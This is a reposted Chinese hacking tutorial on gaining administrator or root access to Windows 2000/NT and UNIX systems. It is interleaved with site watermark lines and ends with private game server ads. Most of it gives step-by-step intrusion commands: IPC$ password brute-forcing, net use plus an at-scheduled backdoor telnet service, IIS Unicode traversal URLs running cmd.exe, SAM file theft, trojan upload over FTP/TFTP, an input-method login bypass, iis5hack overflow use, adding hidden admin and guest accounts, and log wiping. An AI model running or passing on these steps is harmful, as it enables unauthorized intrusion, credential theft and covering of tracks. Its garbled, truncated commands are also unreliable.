其实“口令入侵”这个主题网上有很多现成的教程,我在这里把它整理一下。不管是破解FTP口令还是TELNET口令,最终的目的都是为了取得系统控制权,成为administrators/root用户。对windows2000/NT来说,获得其管理员身份无非三种途径:一是得到SAM._文件,然后用10phtcrack之类的工具来暴力破解;二是用流光之类的工具对目标系统的简单IPC$、FTP密码、SQL密码等进行扫描探测;三是通过系统漏洞,绕过系统身份认证以管理员身份进去,然后添加一个administrators组的用户和密码。第一种方法需费很多时间,只要得到了SAM._文件,成功几率倒也不小;第二种方法只对那些粗心大意的网络管理员有用,譬如他将密码设置为1234,那用流光很快就能探测出来;第三种方法最为常见,寻找系统漏洞,然后尝试入侵,一直以来是网上入侵者们的兴趣所在,而且成功概率也高。对于UNIX/Linux系统,获取一个root权限要困难得多,通过查看一些资料,我发现这类入侵都遵循这么一个思路:1、远程系统,试图发现漏洞,如rpc漏洞、FTP匿名登陆等。2、finger远程系统,尝试获得其用户列表。3、根据已获得资料试图得到远程系统的一个shell。这一步很重要,黑客的水平如何就体现在这里了,一些高明的黑客利用极其简单的一个系统弱点就能得到一个自己想要的shell。4、得到shell后,黑客就可以远程rsh或rlogin过去了,然后查看系统版本信息,根据已有的经验判断该系统可能存在的缓冲区溢出漏洞。5、查找系统可写入目录,并判断自己是否有可编译权限。6、当这一切完成后,就上传一个溢出程序,在远程主机上编译并执行,从而利用溢出漏洞得到root权限。7、留下后门,清除日志。
dedecms.com
dedecms.com
一、WINDOWS系统口令入侵
内容来自dedecms
对于WIN2000/NT系统的口令入侵已讲得太多,我也不愿意将旧的故事一遍又一遍的重提。一般来说,这类入侵具体有这么几种手法:1、通过IPC$口令破解入侵;2、利用Unicode漏洞尝试入侵;3、利用开放终端服务和输入法漏洞入侵;4、利用IIS远程溢出漏洞入侵;5、利用SQL弱口令入侵。下面我简要介绍这5种入侵过程,看完后你会发现,原来进入远程系统是如此容易。
dedecms.com
织梦好,好织梦
1、IPC$入侵:IPC$是指进程间的通信,win2000/NT主机之间通过它来实现数据交换。而利用这一特征还在于2000/NT系统有一个默认的隐藏共享,这个共享被设计的初衷是为了方便管理员远程管理操作系统的,现在却被拿来实现他们的目的。 copyright dedecms
copyright dedecms
开启流光,选择“探测->扫描POP3/FTP/NT/SQL主机”,在“开始地址”和“结束地址”里都填入目标地址:192.168.4.95,在“扫描主机类型”下拉菜单里选择“NT/98”,点“确定”开始。 dedecms.com
经过几秒钟后,192.168.4.95 这台主机就出现在左边的主机类型“IPC$主机”里。选择这台主机,点击右键,在弹出的下拉菜单里选择“探测->探测IPC用户列表”。 本文来自织梦
开始探测,只要用户的密码字典里包含目标主机的密码,则流光迟早能探测出来,探测时间的长短取决于用户的密码字典大小和攻击机器的运行速度;典型的字典都有十几兆大小,这样探测起来就需要很长(可能是几天)的时间。经过几分钟的探测后,我们发现,流光已成功的探测到了目标主机的三个密码,其中包括系统管理员Administrator密码:cell. dedecms.com
好了,有了目标主机的系统管理员密码后,这台主机就已经完全控制在我们手中了。下面说明如何利用流光探测到的密码从IPC$入侵主机. dedecms.com
开DOS窗口,先PING一下目标主机:192.168.4.95,看看TTL值为128,可以判定这台主机为NT/WIN2000系统了,正是我们所要。用如下命令: 织梦内容管理系统
c:\>net use “cell” /user:”administrator” 内容来自dedecms
提示:命令运行成功。已经成功的和目标主机建立连接。
copyright dedecms
复制一个Telnet程序上去(小榕流光安装目录下的Tools目录里的Srv.exe) ,这个程序是在目标系统上开一个Telnet服务,端口是99。 dedecms.com
c:\>cd tools
c:\>tools>copy .\srv.exe
内容来自dedecms
admin$是NT的默认的隐藏共享,他对应的是NT安装目录里的system32目录.通常是在c:\winnt\system32,你也可以用C$ , D$ 他们分别代表盘符C盘,D盘.都是系统的默认共享。 copyright dedecms
显示:已复制 1个文件。文件复制成功。 本文来自织梦
下面我们需要远程启动这项服务,利用WIN2000的SCHEDULE(定时)服务来启动这个程序。先看一下目标系统的时间:
织梦好,好织梦
c:\>net time 本文来自织梦
显示: copyright dedecms
的当前时间是2001/10/22上午10:00
命令成功完成。
copyright dedecms
下面设定目标系统的TELNET服务在指定时间内启动,用at命令:
dedecms.com
c:\>at 10:02 srv.exe
显示: 本文来自织梦
新加了一项作业,作业ID=1。
说明命令成功执行,下一步就等到服务启动后TELNET上去。 织梦好,好织梦
2分钟后,可以TELNET了: copyright dedecms
c:\>telnet 192.168.4.95 99
本文来自织梦
(srv.exe开的端口是99.这里我们就telnet 192.168.4.95 99) dedecms.com
这个程序好在不用输入口令和没有日志记录.但是每一次使用后都会自动关闭,下次要用时要重新启动,才能再用。
dedecms.com
我们看到如下界面: dedecms.com
Microsoft Windows 2000 [version 5.00.2195] 织梦好,好织梦
<c>版权所有 1985-2000 Microsoft Corp. 内容来自dedecms
C:\WINNT\system32\> copyright dedecms
这样,我们就成功的登陆上去了。
由于我们已经是系统的管理员,所以有权在目标主机上做任何事,包括创建文件、删除文件、给文件该名、创建、删除用户帐号等。至此,目标系统再无任何可言。
dedecms.com
当然,我们还可以以目标系统为跳板,进一步入侵别的系统。
另开一个DOS窗口,先复制TOOLS目录下的另一个文件NTLM.EXE上去:
织梦内容管理系统
c;\tools\>copy .\ntlm.exe
这个程序是用来改变WIN2000 TELNET SERVER 的身份验证方式,将其改为明文验证。 织梦内容管理系统
回到前一个DOS窗口,执行NTLM:
织梦内容管理系统
C:>ntlm
有提示字符显示命令成功完成。
dedecms.com
然后我们重启一下TELNET 服务,用如下命令行: 织梦好,好织梦
c:\>net stop telnet
然后再: 织梦好,好织梦
c:\>net start telnet dedecms.com
提示: 织梦好,好织梦
TELNET 服务已经成功启动。
本文来自织梦
这样,你就可以以它为跳板,入侵别的主机了。 dedecms.com
再次登陆本身:
C:\>telnet 192.168.4.95 内容来自dedecms
要求输入用户名和口令。输入用户名administrator和 口令:cell,回车后登陆成功了。到此为止,我们已经完全取得了目标系统的控制权,一次入侵成功。 织梦好,好织梦
我们希望到此为止就罢手了,可是他会罢手吗?不会。他还会在系统里留下几个后门,这样就算管理员密码被改了他也可以利用自己设置的后门进到系统。通常的,他会把系统guset帐号激活并加入管理员组,在TELNET终端下输入如下命令:
c:\>net user guest /active:yes
c:\>net user guest 1234
织梦内容管理系统
c:\>net localgroup administrators guest /add
这样他下次就可以用guset用户名,密码1234以系统管理员身份登陆了。 copyright dedecms
当然,不要忘了擦除痕迹,把c:\winnt\system32\logfiles\w3svc1\下的文件都给删了吧。
织梦好,好织梦
织梦好,好织梦
要防止这类入侵,第一是要将系统密码设置得复杂一些,不要使用生日和常用字符作为密码,而使用字母和数字的组合如lo3v4e之类的密码则普通的流光探测就无能为力了。第二是更改注册表,禁止建立空连接和禁止管理共享。 内容来自dedecms
dedecms.com
2、Unicode漏洞入侵: 本文来自织梦
这类入侵在网上提得实在太多了,我也没心思写出更好的教材,下面转一篇: 内容来自dedecms
首先我们来看看这个漏洞的原理。
在中文版的IIS4,和ISS5中,存在一个BUG,原因是UNICODE编码 存在BUG 在UNICODE 编码中,发现了一个奇怪的编码方式,
例如:
%c1%hh %c0%hh (0x00〈= 0xhh 〈 0x40)
IIS 把 "%c1%hh" 编码成
(0xc1 -0xc0) * 0x40 + 0xhh.
例如 (Windows 2000 + IIS 5.0 + SP1 简体中文版):
IIS 将返回"@.ida" 找不到该文件 在这里 (0xc1-0xc0)*0x40+0x00=0x40=’@’
IIS 将返回 "A.ida" 找不到该文件 这里 (0xc1-0xc0)*0x40+0x01=0x41=’A’
IIS 将返回 "B.ida" 找不到该文件 ....
IIS 将返回 "!.ida" 找不到该文件
这就意味着你能利用这些编码的特点。
例如:
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ’/’
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ’\’
所以我们就可以用这种方法进入一些目录。
(1http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
这样我们将得到 dedecms.com
Directory of d:\inetpub\scripts
2000-09-28 15:49 〈DIR〉
. 1999-07-21 17:49 147,456
Count.exe 2000-09-12 17:08 438,290
Count25.exe 2000-10-13 15:03 8,867
counter.err 2000-08-23 23:07 160,002
counter.exe 1999-05-25 18:14 3,925
CountNT.html 1999-07-21 17:49 64,512
extdgts.exe 2000-08-10 15:24 46,352
ism.dll 1999-07-21 17:49 64,512
mkstrip.exe 1999-05-25 18:18 1,317
README.txt 2000-09-28 15:49
〈DIR〉 wcount 9 File(s) 935,233 bytes
(2) 我们也可以利用此BUG得到一些系统文件的内容
IIS 将把它当作 a .ASP 文件提交.它将让 asp.dll 来打开文件win.ini
如果用 IIS 4.0+SP6(中文版), 将不能测试成功 但是我们能用下列方法得到。
"default.asp" 是一个存在的 .ASP 文件, "a.exe" 是一个随机的 .EXE 文件名. 它可以不存在。
打上SP1仍然还有这种编码问题。
在英文中使用 %c1%af 能正常利用这个漏洞。
2.了解了漏洞的详细资料。让我们来说说怎么利用。
内容来自dedecms
下面来说说几种方法来控制这个机器。
a. 如果c:\winnt\repair\sam._存在
那么我们把copy c:\winnt\repair\sam._ c:\inetpub\wwwroot然后用浏览器下载,用破NT密码的工具,比如l0phtcrack来破。
b.上载文件
1.找一个ftp服务器,将须上载的文件copy 到ftp上,
假设这个 ftp server的 ip:127.1.1.1 ,username:abc,password:bbb 文件名:srv.exe
2.编辑一个上载执行文件
(>>号前不要有空格)
如果你看不懂上面的命令。
你在DOS下打一个ftp /?看看。
:P
copyright dedecms
成功率很高的哦。
3.然后运行它。
srv.exe是我放的一个冰河服务端。 本文来自织梦
下面不用我说了吧。
用冰河客户端连接他就可以了。
:P
顺便说一下
冰河的公用密码是:
05181977
他有70%左右的成功率。
subseven的共用密码是:
abuse
4.当然你也可以给他中一个nc99.exe等的东西。
获取administrator权限
上载getadmin.exe
getadmin iusr_机器名
这一招不一定有效哦。
http:/ip/scripts/ccc.exe?/c+net+user+aaa+12345+/add
http:/ip/scripts/ccc.exe?/c+net+localgroup+administrators+aaa+/add
c. 当然我们也有其他方法来上传文件。
前一段时间黑了几个台湾,net use也练得比较熟了。
看到有一个类似的教程用net use。
我也试了一下,累试不爽。呵呵
找个中转站,利用net use来上传文件。
我们要用到legion。
legion是一个共享的软件。
你通过用它,你会找到一大堆的蠢伙。把整个C.D盘共享,并且不用密码的。
当然,设置密码也是没用的。呵呵猜26个字母就搞掂了。当然这要用另外一个软件。:P,在这就不说了。
本文来自织梦
近来类技术提得最多的漏洞莫过于 %c1%1c 的问题。
%c1%1c,中文简体里面没有这种字,照正常的情况根据内码转换文件
\winnt\system32\c_936.nls会编码成“?”。但对中文简体版IIS中
c1 1c解码成了(c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路
径串中的“..\”之后,所以可以突破IIS路径访问到上级目录。此漏洞
从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0
+SP1,好像台湾繁体中文也受此漏洞影响。
执行
/cmd.exe?/c+dir%20c:\发现列出了远程主机C:\下的所有文件,执行:
+copy%20c:\autoexec.bat%20c:\autoexec.bak 成功实现文件的复制,
执行
cmd.exe?/c+del%20c:\autoexec.bak 成功实现文件的删除,哇!太利害了。
随便浏览了一下,因为是国内的主机,不想搞破坏,只想练练手!目的:
获得Administrator权限。
执行
cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot把sam._文件拷贝到wwwroot文件内,输入._
dedecms.com
织梦内容管理系统
本文来自织梦
文中提及的FTP上传现在不太用了,都改用TFTP上传。我简要说一下TFTP的使用方法: 内容来自dedecms
首先使自己的系统配置成为TFTP服务器。这个很好办,下载一个TFTP在本机运行起来。然后在存在U漏洞的目标主机浏览器里输入:
copyright dedecms
这里的srv.exe是你想要放的木马程序。注意:要上传的文件必须和TFTP在同一目录下。192.168.4.95是对方IP,192.168.4.91是自己IP。然后通过浏览器来执行这个木马: copyright dedecms
回车后木马就在远程主机上运行了。以后能做什么事就取决于该木马的功能。 织梦好,好织梦
当然,也可以通过TFTP来下载,譬如说我想把它的c:\winnt\repair\SAM._文件down下来,就在浏览器里这样输入: copyright dedecms
这样SAM文件就被下载到本地TFTP的同一个目录里。 织梦内容管理系统
当然也可以先把目标主机的SAM文件复制到c:\inetpub\wwwroot\,然后通过浏览器来下载。这样做:
本文来自织梦
dedecms.com
这样就把c:\winnt\repair\里的sam文件拷贝到c:\Inetpub\wwwroot\下,利用浏览器把它下载来。在地址栏里输入: 织梦好,好织梦
回车后SAM文件就被下载到本地了。 本文来自织梦
然后用10phtcrack这样的工具进行破解。10phtcrack是大名鼎鼎的破NT密码的工具,成功率很高,一般的密码被破解出来只是时间长短的问题。得到管理员密码后,就可以参考前一种方法进一步入侵系统了。 copyright dedecms
本文来自织梦
3、利用开放终端服务和输入法漏洞入侵:
这种入侵方法也是前一阵网上提得最多的,特点是简单有效,只要发现漏洞,就能成功入侵。其实它不牵涉到口令问题,并不需要对口令进行破解。只是通过系统的漏洞绕过身份验证,然后登陆上去在远程主机添加管理员用户。用到工具:
redmay3389:红色五月的3389端口扫描器,用来网络上开放了终端服务的主机。 内容来自dedecms
微软终端服务客户端:用来和开放了终端服务的连接。
入侵过程:打开redmay3389,输入一段IP地址,开始远程主机的3389端口。稍等一会,找到了几台开了3389端口的主机。随便找一个来测试,打开客户服务端软件,输入IP后尝试连接,几秒钟的时间便连接上对方主机,在客户服务端软件里出现了对方主机的登陆窗口。到现在为止就要看对方的主机有没有输入法漏洞了,如果没有,那就只好打道回府。把鼠标放到用户名框里点击一下,然后按ctrl+shift,把输入法转换到全拼状态,然后把鼠标放到状态条的图标上,按右键弹出一个选项,里面有个选项是帮助,把鼠标放到帮助上,在新弹出的选项里选择“输入法入门”,然后就会弹出一个叫“输入法操作指南”的大的窗口,这个窗口里有个栏目是“选项”,把鼠标放在这个选项上面点击右键,在新弹出的小窗口里选择“跳至url”,然后就会弹出一个窗口,在里面输入盘符和路径就会在“输入法操作指南”窗口的右边显示出来该路径下的内容。现在有两种方法可以攻击: 内容来自dedecms
1.把c:\winnt\system32\cmd.exe程序改名拷贝到c:\inetpub\scripts\目录下,然后在浏览器里来实现攻击,具体方法参看前面的Unicode漏洞入侵。
2.在“跳至url”里的框里输入:c:\winnt\systm32\,这样c:\winnt\system32\下的内容就全在右边窗口显示出来。在显示出来的文件里找到net.exe这个文件,右键后点击“创建快捷方式”,之后系统会自动创建一个“快捷方式 net.exe”的文件,把鼠标放到这个文件上面点右键,选择“属性”,就会弹出一个“快捷方式 net.exe属性”的窗口,这个窗口的“目标”的框里默认的是:c:\winnt\system32\net.exe 在这个命令的后面加上user pyh 1234 /add ,确认后把这个“快捷方式 net.exe”文件点击运行,这样就在远程主机上新建了一个用户:user:pyh;passwd:1234.但是权限只是普通用户的,我们现在把这个用户提升到管理员权限,还是在那个“快捷方式 net.exe属性”窗口的c:\winnt\system32\net.exe后面加上:localgroup administrators pyh /add ,确定后点击运行,这样就把该用户权限提升到系统管理员了。到此为止,我们已成功入侵目标。下一步怎么做不多说,参看前面流光IPC$入侵。 dedecms.com
4、IIS5远程缓冲区溢出攻击: 本文来自织梦
这里是绿盟的公告:
dedecms.com
————————————————————————————————————— dedecms.com
微软Win 2K IIS 5.0 远程缓冲区溢出 织梦内容管理系统
日期:2001-5-6
织梦内容管理系统
受影响的系统:
Microsoft Windows 2000 Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server copyright dedecms
描述:
BUGTRAQ ID: 2674
微软Win 2K IIS 5的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系,缺省情况下该映射存在。当远程用户提交对.printer的URL请求时,IIS 5调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏足够的缓冲区边界检查,远程用户可以提交一个精心构造的针对.printer的URL请求,其"Host:"域包含大约420字节的数
据,此时在msw3prt.dll中发生典型的缓冲区溢出,潜在允许执行任意代码。溢出发生后,WEB服务停止响应,Win 2K可以检查到WEB服务停止响应,从而自动重启它,因此系统管理员很难意识到发生过攻击。
漏洞利用程序见“\漏洞利用\exploit\cgi\iis\iis5hack.zip”。
<* 来源:Riley Hassel of eEye Digital Security *>
——————————————————————————————————————— 内容来自dedecms
焦点对这个漏洞也给出了测试程序,详情请察看我前面写过的《IDTHS测试报告》。 本文来自织梦
对IIS的缓冲区溢出需要用到sunx写的一个小工具:iis5hack.exe,这是一个在DOS下运用的命令行工具,我们将它拷贝到c:\winnt\system32\目录下。然后开DOS窗口,输入如下命令:
c:\>iis5hack 192.168.4.xx 80 1 0
内容来自dedecms
其中80表示目标被攻击端口,第一位0表示操作系统类型为安装了SP1的中文win2000系统,第二位0表示想要在远程系统上打开的TELNET端口,这里表示端口为99。
对IIS5HACK的详细使用方法请参看作者主页 copyright dedecms
过一会,出来提示句行,说明溢出成功,可以在99端口telnet进去了。
内容来自dedecms
到这一步我就不多说了,详情请看前文。主要入侵步骤如下: dedecms.com
添加用户:net user wazzy 1234 /add
将用户加入管理组:net localgroup administrators wazzy /add
本文来自织梦
退出后再net use 连上去,上传木马,这样入侵就成功了。 copyright dedecms
然后微软的IIS还存在两个缓冲区溢出漏洞,这里是绿盟的公告: 织梦内容管理系统
——————————————————————————————————
微软Index Server(.ida/idq) ISAPI扩展远程溢出漏洞 dedecms.com
日期:2001-6-18
本文来自织梦
更新日期: 2001-6-21
受影响的系统: 本文来自织梦
Microsoft Index Server 2.0
- Microsoft Windows NT 4.0 IIS 4.0 内容来自dedecms
Indexing Service in Windows 2000 内容来自dedecms
- Microsoft Windows 2000 IIS 5.0
dedecms.com
描述:
BUGTRAQ ID : 2880
CVE ID : CAN-2001-0500
本文来自织梦
微软IIS缺省安装情况下带了一个索引(Index Server,在Windows 2000下名为"Index Service").缺省安装时,IIS支持两种脚本映射:管理脚本(.ida文件)、Inernet数据查询脚本(.idq文件)。这两种脚本都由一个ISAPI扩展 - idq.dll来处理和解释。 织梦内容管理系统
由于idq.dll在处理某些URL请求时存在一个未经检查的缓冲区,如果攻击者提供一个特殊格式的URL,就可能引发一个缓冲区溢出。通过精心构造发送数据,攻击者可以改变程序执行流程,执行任意代码。
本文来自织梦
成功地利用这个漏洞,攻击者可以远程获取"Local System"权限。
<*来源:Riley Hassell of eEye Digital Security 织梦好,好织梦
相关链接
*> 织梦好,好织梦
绿盟给出了相应的测试程序如下: copyright dedecms
警 告
织梦好,好织梦
以下程序(方法)可能带有攻击性,仅供研究与教学之用。使用者风险自负! dedecms.com
提交下列URL请求: 织梦好,好织梦
GET /NULL.ida?[buffer]=X HTTP/1.1
Host: werd
如果[buffer]的长度超过240个字节,就可能触发溢出。
dedecms.com
IIS的.idq/.ida映射的溢出漏洞已经公布了好久了,但由于利用这个漏洞有比较大的难度,所以可用的攻击程序一直也没写出来。因此,因特网中利用这个漏洞进行攻击的成功率并不高。在焦点里也有针对它的攻击测试程序源代码。
5、SQL弱口令入侵:这个其实没什么说的,前提是很多SQL用户粗心大意,默认 SQL的管理员帐号sa的密码为空。下面是我用流光对本地网络SQL密码的一段探测结果。(略图) 织梦内容管理系统
结果出来,有7个用户的SQL管理员密码为空!
copyright dedecms
随便在上面找一台,用流光的“MSSQL工具”连接上去,执行SQL远程命令。
织梦内容管理系统
点连接后就登陆进去了。然后就在远程主机上添加管理员用户,取得系统的控制权。
本文来自织梦
WIN2000/NT的口令入侵就讲到这里,下面介绍UNIX系统的口令入侵方法。
dedecms.com
二、UNIX系统口令入侵
织梦内容管理系统
我在前面提过了UNIX入侵的思路:1、远程系统,试图发现漏洞,如rpc漏洞、FTP匿名登陆等。2、finger远程系统,尝试获得其用户列表。3、根据已获得资料试图得到远程系统的一个shell。这一步很重要,黑客的水平如何就体现在这里了,一些高明的黑客利用极其简单的一个系统弱点就能得到一个自己想要的shell。4、得到shell后,黑客就可以远程rsh或rlogin过去了,然后查看系统版本信息,根据已有的经验判断该系统可能存在的缓冲区溢出漏洞。5、查找系统可写入目录,并判断自己是否有可编译权限。6、当这一切完成后,就上传一个溢出程序,在远程主机上编译并执行,从而利用溢出漏洞得到root权限。7、留下后门,清除日志。 内容来自dedecms
从以上过程看,UNIX系统的入侵与口令破解的关系并不大,一般情况不大可能象流光入侵NT那样对远程系统的root密码进行穷举探测,这是因为通常主机都不允许远程用户用root登陆,而且在密码试探几次仍不正确后远程主机就会中断这个登陆请求。现在利用John之类的工具来破解passwd档也不是流行的事,因为一是passwd档都是shadow过的,普通用户无法拿到shadow文档,二是用john穷举破解可能需要无穷多的时间。那么入侵这类系统的关键就是找到远程系统的溢出漏洞,然后上传程序编译执行,使其溢出,得到root权限。在UNIX的各种中,不管是SunOS、FreeBSD还是IRIX,HPUnix、Linux等,都存在着不同形式的溢出漏洞。如wu-ftp 2.60存在远程溢出,利用这个远程溢出只要有一个匿名 FTP 账号就可远程获得管理员权限,当然前提是需要一个可写目录。
本文来自织梦
由此可见,对UNIX系统的远程侵入有两个关键:第一是获得一个有写入权限的shell;第二是发现远程系统上存在的溢出漏洞,尝试执行程序使其溢出。通常第一个步骤要困难些,不是每个人都能利用有限的系统弱点获得shell的。至于第二步,就不是很困难了,发现系统版本后,根据经验判断该系统可能存在的漏洞,然后上传程序,执行溢出,把自己的权限提升到root。具体的入侵案例网上有很多现成的,我不在这里赘述 本文来自织梦
1.76精品传奇_1.76天下毁灭_1.76复古传奇_英雄合击_中变靓装传奇_无忧传奇
传奇花屏补丁,花屏补丁,土城花屏补丁,盟重土城花屏补丁下载,土城花屏补丁下载,沙巴克花屏补丁,传奇土城花屏补丁下载
网站每天发布最新、最好的传奇版本下载和与传奇服务端配套开区传奇模版,网游技术教程全部免费下载!
无忧网络是目前唯一家所有的传奇服务端,传奇私服花屏补丁,盟重花屏补丁和传奇客户端下载都经过站长亲自测试并配有真实测试图!
所有的工具软件和传奇版本在发布之前,都会经过站长亲自测试,保证chuanqisf可以进入游戏,所有软件都无毒无插件!
本站声明:本站所有技术资料与下载资源均为网络搜集整理,并不代表本站的观点与立场,如有侵犯您的权益,请来信指出,本站将立即改正Copyright © 2002-2014 无忧网络 版权所有蜀ICP备09041899号